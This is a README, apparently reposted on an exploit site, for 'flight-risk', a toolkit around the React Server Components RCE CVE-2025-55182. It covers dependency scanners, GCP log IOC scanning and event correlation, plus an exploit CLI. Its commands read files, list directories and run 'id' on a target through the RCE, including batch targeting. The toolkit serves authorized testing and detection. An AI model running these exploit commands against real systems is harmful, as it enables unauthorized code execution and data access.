## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JOAOREIS13-FLIGHT-RISK
# flight-risk
> **flight risk** /flaɪt rɪsk/ — React's Flight protocol — это уровень сериализации, лежащий в основе React Server Components. CVE-2025-55182 использует ошибку десериализации в Flight для достижения RCE без аутентификации. Если ваше приложение использует RSC, это _flight risk_.
Набор инструментов безопасности для **CVE-2025-55182 (React2Shell)** — уязвимость удаленного выполнения кода без аутентификации с оценкой CVSS 10.0 в React Server Components. Сканируйте, обнаруживайте, сопоставляйте и тестируйте.
## Что внутри
Инструмент| Описание
---|---
**react2shell-scanner**| Сканирование GitHub организаций и GCP проектов на наличие уязвимых зависимостей React/Next.js. Авторизованное тестирование эксплойтов (безопасное зондирование, чтение файлов, список каталогов, выполнение команд).
**gcp-ioc-scanner**| Запрос к GCP Cloud Logging для поиска индикаторов компрометации в нескольких проектах и сервисах K8s. Подключаемые определения IOC.
**gcp-log-correlator**| Сопоставление событий журнала GCP по временной близости на одном поде — например, найти, какой HTTP-запрос вызвал ошибку RCE.
## Быстрый старт
root@kitploit:~
# Clone
git clone https://github.com/YOUR_USER/flight-risk.git
cd flight-risk
# Install dependencies
pip install -r react2shell-scanner/requirements.txt
pip install pyyaml # for gcp-ioc-scanner
# Make scripts executable
chmod +x react2shell-scanner/bin/*
chmod +x gcp-ioc-scanner/gcp-ioc-scanner
chmod +x gcp-log-correlator/gcp-log-correlator
# Authenticate
gh auth login # GitHub scanning
gcloud auth application-default login # GCP scanning + log analysis
## Использование
Все команды выполняются из корня репозитория.
### Сканирование GitHub организации на уязвимые зависимости
root@kitploit:~
react2shell-scanner/bin/scan-github \
--org YOUR_GITHUB_ORG \
--output ./results/github
### Сканирование GCP проекта на уязвимые образы контейнеров
root@kitploit:~
react2shell-scanner/bin/scan-gcp \
--project YOUR_GCP_PROJECT \
--output ./results/gcp
### Комбинированное сканирование (GitHub + GCP)
root@kitploit:~
react2shell-scanner/bin/scan-all \
--org YOUR_GITHUB_ORG \
--project YOUR_GCP_PROJECT \
--output ./results
### Безопасное обнаружение уязвимостей (без выполнения кода)
root@kitploit:~
python3 react2shell-scanner/cli.py https://your-app.example.com
### Авторизованное тестирование эксплойтов
root@kitploit:~
# Dry run — show payload without sending
python3 react2shell-scanner/cli.py --dry-run --verbose https://your-app.example.com
# Read file via RCE
python3 react2shell-scanner/cli.py --method read-file https://your-app.example.com /etc/hostname
# List directory via RCE
python3 react2shell-scanner/cli.py --method list-dir https://your-app.example.com /app
# Execute command via RCE
python3 react2shell-scanner/cli.py --method exec-cmd https://your-app.example.com "id"
# Batch targets
python3 react2shell-scanner/cli.py --targets targets.txt --output results.json
### Сканирование журналов GCP на шаблоны IOC
root@kitploit:~
gcp-ioc-scanner/gcp-ioc-scanner \
--targets gcp-ioc-scanner/examples/targets-example.yaml \
--iocs gcp-ioc-scanner/iocs/cve-2025-55182.yaml \
--start 2026-01-01 \
--end 2026-04-01 \
--output ./results/ioc-scan
### Сопоставление событий журнала (поиск запроса, вызвавшего RCE)
root@kitploit:~
gcp-log-correlator/gcp-log-correlator \
--project YOUR_GCP_PROJECT \
--namespace frontend \
--pod-pattern "web-app.*" \
--trigger-filter 'severity=ERROR' \
--preceding-filter 'httpRequest.requestMethod:*' \
--window 30s \
--start 2026-04-01T00:00:00Z \
--end 2026-04-02T00:00:00Z \
--format json,markdown \
--output ./results/correlation
## Docker
root@kitploit:~
cd react2shell-scanner
docker compose -f docker/docker-compose.yml build
docker compose -f docker/docker-compose.yml run scanner-shell
## Структура каталогов
root@kitploit:~
flight-risk/
├── README.md
├── LICENSE
├── react2shell-scanner/
│ ├── bin/ # scan-github, scan-gcp, scan-all
│ ├── cli.py # Exploit testing CLI
│ ├── exploit.py # Exploitation logic
│ ├── utils.py # Shared utilities
│ ├── lib/ # Shell + Python helpers
│ ├── vuln-defs/ # Pluggable vulnerability definitions
│ ├── docker/ # Containerized scanning
│ ├── examples/ # Example scripts
│ ├── test-app/ # Vulnerable Next.js fixture
│ └── requirements.txt
├── gcp-ioc-scanner/
│ ├── gcp-ioc-scanner # IOC log scanner
│ ├── iocs/ # IOC pattern definitions
│ └── examples/ # Target config examples
└── gcp-log-correlator/
├── gcp-log-correlator # Event correlator
└── examples/ # Correlation examples
## Требования
* Python 3.10+
* GitHub CLI (`gh`)
* Google Cloud SDK (`gcloud`)
* `jq`
* Docker 20.10+ (опционально)
## CVE-2025-55182
## Юридическая информация
**Только авторизованное использование.** Этот набор инструментов содержит код эксплойтов. Используйте его только против систем, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование может нарушить Закон о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. 1030) и аналогичные законы.
## Лицензия
MIT — см. LICENSE.